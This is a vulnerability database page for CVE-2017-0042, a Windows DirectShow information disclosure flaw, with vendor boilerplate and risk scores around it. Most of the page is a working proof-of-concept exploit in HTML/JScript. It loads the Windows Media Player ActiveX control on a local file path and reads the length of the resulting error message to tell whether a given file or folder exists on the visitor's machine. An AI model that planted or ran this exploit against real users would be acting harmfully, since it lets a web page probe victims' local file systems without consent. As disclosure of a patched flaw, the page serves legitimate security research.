Lucene search
K

Microsoft Windows DirectShow Information Disclosure Vulnerability(CVE-2017-0042)

🗓️ 29 Mar 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 34 Views

Microsoft Windows DirectShow Information Disclosure Vulnerability(CVE-2017-0042) exploi

Related
Code

                                                <!--
	Credit: @qab && @shhnjk
	Keep changing param.url to your desired file to detect. 
	This works on folders as well ( ex: file://C://Windows//con.mp3 )

	To see why we are using a reserved windows name 'con.*' remove it and try to 'detect' a file without it.
-->
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<PARAM NAME="URL" VALUE="file://C://Windows//win.ini//con.mp3">
<param name="captioningID" value="displaylyric" />
<PARAM NAME="autoStart" VALUE="-1">
</OBJECT>
<SCRIPT LANGUAGE = "JScript"  FOR = Player  EVENT = error()>

if(Player.error.item(0).errorDescription.length==189){
	alert('File not detected.');
}
else{
	alert('File detected!');
}
</SCRIPT>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2017 00:00Current
4.5Medium risk
Vulners AI Score4.5
EPSS0.14442
34